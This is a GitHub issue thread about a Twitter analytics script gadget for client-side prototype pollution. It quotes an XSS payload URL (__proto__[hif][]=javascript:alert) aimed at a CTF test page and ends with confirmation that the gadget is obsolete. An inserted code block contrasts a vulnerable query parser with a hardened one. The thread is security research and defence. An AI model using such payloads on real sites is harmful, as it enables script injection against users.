BlackFan / client-side-prototype-pollution

Prototype Pollution and useful Script Gadgets

Twitter Universal Website Tag gadget payload blocked by browsers (both Chrome and Firefox) #9

Closed dexter-morgan closed 3 years ago

dexter-morgan commented 3 years ago

Hi Sergey!

I was trying to trigger an XSS on https://ctf.nikitastupin.com/pp/known.html?__proto__[hif][]=javascript:alert(document.domain) by following https://github.com/BlackFan/client-side-prototype-pollution/blob/master/gadgets/twitter-uwt.md. I got the following error on Chrome:

_Refused to execute script from 'https://analytics.twitter.com/i/adsct?type=javascript&version=1.1.0&p_id=Twitter&p_user_id=0&txn_id=twitter_pixel_id&events=%5B%5B%22pageview%22%2Cnull%5D%5D&tw_sale_amount=0&tw_order_quantity=0&tw_iframe_status=0&tpx_cb=twttr.conversion.loadPixels&tw_document_href=https%3A%2F%2Fctf.nikitastupin.com%2Fpp%2Fknown.html%3F__proto__%5Bhif%5D%5B%5D%3Djavascript%3Aalert(document.domain)' because its MIME type ('text/html') is not executable, and strict MIME type checking is enabled._

Could you advise if you see a workaround here?

Thanks and cheers!


BlackFan commented 3 years ago

Hi, this payload works for me in all tested browsers. Check the HTTP response of /i/adsct which returns an error; there should be twttr.conversion.loadPixels({}).
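
The point BlackFan makes above is that the `{}` handed to `loadPixels` inherits whatever a polluted `hif` holds. The following is an added example, not code from this repository or from uwt.js: a minimal bracket-style query-string parser of the kind that lets `?__proto__[hif][]=...` reach `Object.prototype`, beside a hardened parser and the own-property check a consumer can apply. All function names are hypothetical.

```javascript
// Added example (hypothetical names): vulnerable vs. hardened parsing of
// bracket-style query keys such as "__proto__[hif][]=value".

const UNSAFE_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);

// "a[b][]" -> ["a", "b", ""]; a trailing "" means "append to an array".
function splitKey(rawKey) {
  const m = rawKey.match(/^([^\[]+)((?:\[[^\]]*\])*)$/);
  if (!m) return [rawKey];
  return m[2] ? [m[1], ...m[2].slice(1, -1).split("][")] : [m[1]];
}

// Walks the key path and stores the value; `make` creates containers.
// With plain {} containers, a first segment "__proto__" resolves to
// Object.prototype, so the value becomes visible on every later {}.
function store(root, path, value, make) {
  let cur = root;
  for (let i = 0; i < path.length - 1; i++) {
    const seg = path[i];
    if (cur[seg] === undefined) cur[seg] = path[i + 1] === "" ? [] : make();
    cur = cur[seg];
  }
  const last = path[path.length - 1];
  if (last === "") cur.push(value); else cur[last] = value;
}

function parsePairs(qs) {
  return qs.replace(/^\?/, "").split("&").filter(Boolean)
    .map((p) => p.split("=").map((s) => decodeURIComponent(s)));
}

// Vulnerable: plain objects as containers, no key filtering.
function parseQueryVulnerable(qs) {
  const out = {};
  for (const [k, v = ""] of parsePairs(qs)) store(out, splitKey(k), v, () => ({}));
  return out;
}

// Hardened: null-prototype containers and dangerous segments dropped.
function parseQuerySafe(qs) {
  const out = Object.create(null);
  for (const [k, v = ""] of parsePairs(qs)) {
    const path = splitKey(k);
    if (path.some((seg) => UNSAFE_SEGMENTS.has(seg))) continue;
    store(out, path, v, () => Object.create(null));
  }
  return out;
}

// Consumer-side check: honour "hif" only when the caller set it itself.
function ownHif(config) {
  return Object.prototype.hasOwnProperty.call(config, "hif") ? config.hif : undefined;
}
```

Running the vulnerable parser on the constructed key `__proto__[hif][]=polluted-value` makes `({}).hif` resolve to `["polluted-value"]`, while `ownHif({})` stays undefined and the hardened parser leaves `Object.prototype` untouched.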

halfluke commented 2 years ago

Sorry for "reopening" this, but it looks like this gadget no longer works in any browser: no XSS is triggered. Has it been fixed?

BlackFan commented 2 years ago

Yes, it looks like uwt.js was rewritten a few months ago and no longer contains the loadPixels function that was used in the gadget.

halfluke commented 2 years ago

Thank you for confirming :)